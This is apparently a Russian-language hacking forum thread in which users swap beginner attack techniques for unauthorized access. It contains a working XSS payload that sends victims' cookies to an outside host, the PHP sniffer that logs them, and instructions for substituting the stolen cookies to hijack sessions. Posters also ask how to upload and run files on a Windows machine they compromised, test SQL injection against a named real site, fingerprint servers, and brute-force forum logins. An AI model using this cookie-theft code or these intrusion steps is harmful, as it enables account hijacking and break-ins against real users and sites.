Это чтото типа соли. токо для логина. короче лучше ставь себе этот двиг на машину и ковыряйся и разбирайся
Подскажите, на снифер приходят такого рода данные com=iua=1;%20b=b;%20iua=1;%20b=b;%20holder=1;%20UH=25a4c4a69cc7f;%20I=24c6983d0fe73223;%20L=1.11 благодаря xss на уязвимом сайте , тобиш тело письма такое HTML: <script>document.location.replace('http://*****.t35.com/script.php?com='+document.cookie);</script> код снифа : PHP: <? $query = $_SERVER['QUERY_STRING']; $query .= "\n"; $db="cookies.txt"; $fh=fopen ($db, "a+"); fputs ($fh, "$query"); fclose ($fh); ?> что обозначают полученные данные, тоесть что приходит...?
Так точно,сержант Витя )У мя от нижеприведённого сплойта сознание уплывает)Ну что ж,попробую чтоли : Р
Хакнул комп с помошбю последнего сплоита под мастдай. есть cmd.exe подскажите как залить мне файл туда. чтобы потом его выполнить или чтото подобное подскажите что можно с делать в моём случае ЗЫ с меня +
это мой друг к тебе пришли куки (Ку́ки (слово не склоняется; от англ. cookie — печенье) — небольшой фрагмент данных, созданный веб-сервером и хранимый на компьютере пользователя в виде файла, который веб-клиент (обычно веб-браузер) каждый раз пересылает веб-серверу в HTTP-запросе при попытке открыть страницу соответствующего сайта. © ru.wikipedia.org) Теперь твоя задача, подменить на полученные данные, свои. А сделать это можно следующим образом: Mozilla Firefox - при помощи плагина: Add N Edit Cookies Opera - следующей манипуляцией: "Инструменты -> Дополнительно -> Управление cookies..."
Code: POST /process.wget_upload.php HTTP/1.0 Host: oneclicktube.com Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1 Content-Type: application/x-www-form-urlencoded Content-length: 214 Connection: Close title=&keywords=Mr%2E&[email protected]&[email protected]&[email protected]&[email protected]&url=dds'&button=Reset&submit=Upload& Блинд вроде...но и как блинд не хочет раскручиваться(
Как руками определить версию сервера и название сервера. Я посылаю кривой пакет и иногда в ошибке есть имя и даже иногда версия сервера. Есть ли другие методы определения? И может есть какиенить спец пакеты на которые веб сервер так ругнется что всегда будет название в ошибке? И как определяет хспайдер?
Code: [The_HuliGun@server]$ nc edu.mail.ru 80 HEAD / HTTP/1.0 HTTP/1.1 302 Found Server: nginx/0.6.31 Date: Thu, 30 Jul 2009 14:34:34 GMT Content-Type: text/html; charset=iso-8859-1 Connection: close Location: http://edu.mail.ru/cgi-bin/index.cgi
Krist_ALL Что значит "руками" ? Пощупав его что-ли? Попробуй сформулировать вопрос нормально, что тебе нужно Ты пакет экспресс почтой что-ли посылаешь?
Krist_ALL Я тя не понял. Часто, при ошибках сервера вылетает ошибку и внизу версия Апача и т.д... Как вызвать? site.ru/[несущетсвующая дира]... Если не правильно понял, то задай нормально вопрос.
В HTTP-ответе сервера (заголовки Server, X-Powered-By): Code: HTTP/1.1 200 OK Date: Thu, 30 Jul 2009 17:51:04 GMT Server: Apache/2.2.6 (Fedora) X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 16505
Доброе утро. Пробегялся я брутом подному форуму. И заметил одну вещ, есть NICK: slot Pаsswd: 00 Но дело в том , что можно войти и таким поролем 000, т.е. если в пароле одни "нули", то длина пароля не имеет значене. Токое происходит только с нулями. Это какойто баг? И возможно ли что нибуть поиметь с этого?